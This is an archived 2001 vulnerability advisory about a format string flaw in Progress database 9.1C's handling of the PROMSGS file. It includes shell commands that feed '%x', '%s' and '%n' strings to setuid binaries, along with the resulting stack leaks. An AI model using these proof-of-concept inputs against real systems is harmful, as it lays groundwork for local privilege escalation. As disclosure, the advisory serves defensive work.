5th Nov 2001 [SBWID-4840]
COMMAND
Progress database (format string overflow)
SYSTEMS AFFECTED
PROGRESS Version 9.1C
PROBLEM
KF <dotslash@snosoft.com> found following :
Well once again I have found yet another Progress database issue. The
PROMSGS has been looked at one time already for buffer overflows. It
was supposed to be fixed. I was poking around at it today and noticed
these format strings issues... PROGRESS Version 9.1C as of Thu Jun 7
10:03:59 EDT 2001
First test with a malformed PROMSGS.
[elguapo@linux bin]$ echo blah > file
[elguapo@linux bin]$ export PROMSGS=./file
[elguapo@linux bin]$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
Test to make sure they fixed my original hole with the buffer
overflows. (looks fine)
[elguapo@linux bin]$ echo `perl -e \'print \"A\" x 20000\'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
Well if you use a format string instead of an A we get much better
results.
[elguapo@linux bin]$ echo `perl -e \'print \"%x\" x 9000\'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec00xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ echo `perl -e \'print \"%s\" x 9000\'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
rcurctr overflow reading promsgs file.
(note the overflow msg)
[elguapo@linux bin]$ echo `perl -e \'print \"%n\" x 9000\'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-3395409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)128578246822421057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
ALL suids in the dlc/bin dir are affected
SOLUTION
Nothing yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
